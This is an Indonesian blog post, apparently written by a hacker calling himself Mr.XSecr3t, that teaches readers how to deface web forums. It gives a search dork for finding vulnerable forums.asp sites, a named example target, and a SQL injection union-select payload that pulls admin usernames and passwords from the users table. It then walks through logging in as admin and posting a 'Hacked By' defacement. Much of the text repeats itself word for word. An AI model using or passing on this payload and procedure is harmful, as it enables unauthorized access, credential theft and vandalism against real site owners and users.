Hello pengunjung Setia blog tercinta ane...
karena Berhubung ane NGAKAK karena ada yang Melakukan DEFACE SEMACAM ini di forum suatu team hacker indo
jadi Ane POST gimana caranya Deface Forum sederhana ini
Okee ..
langsung ke TKP aja bung ...
Masukkan Dork Berikut untuk search target forum mana yang ingin di deface ..
dork :inurl:/forums.asp?iFor= (kembangkan lagi biar maksimal) tambahkan site:com dibelakang urlnya terserah mau com/co/id
setelah itu akan ada banyak target yang akan keluar ....
pilih salah satu target semisal URL target forum sebagai berikut :
http://www.coachgirl.com/forum/forums.asp?iFor=8&offset=58
maka kemungkinan VULN .. bukan berarti yang tidak ada angkanya ga VULN .. just Delete the number from, end of URL .. jadinya gni
http://www.coachgirl.com/forum/forums.asp?iFor=8&offset=
Lalu Setelah itu TAMBAHKAN EXPLOIT Sqlnya yakni :
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
jadinya URL akan menjadi seperti ini :
http://www.coachgirl.com/forum/forums.asp?iFor=8&offset=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Lalu Tekan ENTER!!
kalau vuln maka akan keluar Nama table Seperti table Nama pada umumnya
yang bernamakan 10 TOPICS adalah Username admin
yang bernamakan DATE adalah passwordnya ...
disini kita mengidentifikasi bagaimana cara Loginnya ...
maka akan ada tulisan login diatas tables berikut
yakni bentuknya seperti berikut :
HOME | Login | Register
ada disamping kiri paling atas TABLE
maka Login lah menggunakan salah satu username dan password dicoba 1 per 1
jika ada bacaan http erorr 404.0 not found artinya kita tidak bisa mengakses forum tersebut karena sudah dipatch ulang
jikalau kita berhasil/SUKSES masuk ke admin panel ....
tinggal kita EKSEKUSI aja dah :P
caranya gimana ??
buat Topic baru/thread/berita terbaru ..
caranya Klik POST NEW TOPIC
lalu isi Subjectnya HACKED By BLABLABLAAAA ....
lalu isikan script Deface kalian di TOPICnya :P
walla!! Deface SUKSES !! Tinggal kita cari thread number dari URL yang kita buat tadi dimana :P
atau kalau ingin menutup seluruh Thread tinggal copykan aja script Berikut :
Hacked By Mr.XSecr3t
karena Berhubung ane NGAKAK karena ada yang Melakukan DEFACE SEMACAM ini di forum suatu team hacker indo
jadi Ane POST gimana caranya Deface Forum sederhana ini
Okee ..
langsung ke TKP aja bung ...
Masukkan Dork Berikut untuk search target forum mana yang ingin di deface ..
dork :inurl:/forums.asp?iFor= (kembangkan lagi biar maksimal) tambahkan site:com dibelakang urlnya terserah mau com/co/id
setelah itu akan ada banyak target yang akan keluar ....
pilih salah satu target semisal URL target forum sebagai berikut :
http://www.coachgirl.com/forum/forums.asp?iFor=8&offset=58
maka kemungkinan VULN .. bukan berarti yang tidak ada angkanya ga VULN .. just Delete the number from, end of URL .. jadinya gni
http://www.coachgirl.com/forum/forums.asp?iFor=8&offset=
Lalu Setelah itu TAMBAHKAN EXPLOIT Sqlnya yakni :
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
jadinya URL akan menjadi seperti ini :
http://www.coachgirl.com/forum/forums.asp?iFor=8&offset=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Lalu Tekan ENTER!!
kalau vuln maka akan keluar Nama table Seperti table Nama pada umumnya
yang bernamakan 10 TOPICS adalah Username admin
yang bernamakan DATE adalah passwordnya ...
disini kita mengidentifikasi bagaimana cara Loginnya ...
maka akan ada tulisan login diatas tables berikut
yakni bentuknya seperti berikut :
HOME | Login | Register
ada disamping kiri paling atas TABLE
maka Login lah menggunakan salah satu username dan password dicoba 1 per 1
jika ada bacaan http erorr 404.0 not found artinya kita tidak bisa mengakses forum tersebut karena sudah dipatch ulang
jikalau kita berhasil/SUKSES masuk ke admin panel ....
tinggal kita EKSEKUSI aja dah :P
caranya gimana ??
buat Topic baru/thread/berita terbaru ..
caranya Klik POST NEW TOPIC
lalu isi Subjectnya HACKED By BLABLABLAAAA ....
lalu isikan script Deface kalian di TOPICnya :P
walla!! Deface SUKSES !! Tinggal kita cari thread number dari URL yang kita buat tadi dimana :P
atau kalau ingin menutup seluruh Thread tinggal copykan aja script Berikut :
Hacked By Mr.XSecr3t
)
Mr.XSecr3t Ft Mr.Shlalom
Wkwkwkwk
Kode diatas bisa diubah sesuai keinginan Kalian
Trus klik tombol post...
Ok, HTML deface'an kalian udah masuk... sekarang klik judul postingan yang sobat tulis di subject tadi.
DEFACE SUKSES BUNG!!
Sekian TUTOR dari Ane....
NITIP NAMA YAK jangan lupa :P
mau copas artikel ini ?SERTAKAN SUMBER
thank's before for admin !
Example :
see My Picture
Note: karena Deface macam ini sudah banyak digunakan ditambah target yang mulai sedikit ...
mungkin agak sedikit usaha demi menghilangkan RASA PENSARAN Kalian yak :P
Mr.XSecr3t :troll:
Tidak ada komentar:
Posting Komentar